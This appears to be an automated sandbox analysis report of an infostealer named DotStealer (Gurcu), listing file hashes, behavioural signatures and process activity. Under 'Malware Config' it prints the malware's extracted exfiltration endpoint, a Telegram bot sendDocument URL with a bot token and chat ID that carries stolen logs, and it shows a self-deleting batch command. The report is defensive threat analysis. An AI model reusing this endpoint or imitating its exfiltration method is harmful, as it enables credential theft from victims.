Analysis
-
max time kernel
38s -
max time network
39s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
29-09-2024 20:09
General
-
Target
DotStealerBuild.exe
-
Size
5.6MB
-
MD5
efdc135bf08ac422784451e17cfa20a7
-
SHA1
e53453a9f597674c94ea81d246d2754f8515621f
-
SHA256
f79fbda470eb305348d8a66b3df77c1cf753c21165d0d1741b1fffa9829969d7
-
SHA512
dfb3faf87353693593d3bd98bbbb771b009741dc114f312179205d8022e4d41500a8eea65a580a304db32ae1368d020bef0826c09199d4f13601fdd11679052c
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4557737896&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe"C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7EB1.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7EB1.tmp.bat2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
183B
MD5ab4280e4529d5f95e500099537f81e14
SHA1fe815f4f3a014e4dd27a1dd1d5a5d1670188e82c
SHA256f931554e81e527299a8ca0d416274ec2c218f5c5cdef2330ec5f804d536c08c5
SHA51244843c40f335fd2e6daf02296b15e98d80a07bdae9a3af02fc54751ca5fdfe3b49ae4724709de1e29a8a6ee74435b31127d142dbc3d715ca1119e058c61c7f1c
-
Filesize
20KB
MD504d4c386aaf03e6dca3ac87334f03d3f
SHA174627631ce3bd2ba43a12aac39f232da662a32c5
SHA256c130cf082fdce58c9055dba5775490ad8e41055ead5edb0b1e411330144c971d
SHA51201bce1bbdf00825e19c23559ec41a0236b059cec2e891cf4729288b6275aaff62f442b4556c869bfbe17a91475f22dc98522381b2e4f3bef6d1611f7f9f9bc1a
-
Filesize
232KB
MD5d09803efcbe3f4388d1a22010f53b5b9
SHA14e3d87890687bc50809ac33d1c4b87d2febc4c6f
SHA25690e5a153e8fdd736699c9b9d04241c317fadf83ddc507530dc56b13902f9188c
SHA512e007c8709e1845cab2bbde611bf3429284341340b8e59950fe7fb1a45e16786a02dd7edc3e67549f3cb057df3c6b4cb17a59587a1ec70890eeaf9a7b0d9c4541
-
Filesize
136KB
-
Filesize
72KB
-
Filesize
120KB
-
Filesize
424KB
-
Filesize
712KB
-
Filesize
320KB
-
Filesize
8KB
-
Filesize
232KB
-
Filesize
152KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
472KB
-
Filesize
40KB
-
Filesize
5.6MB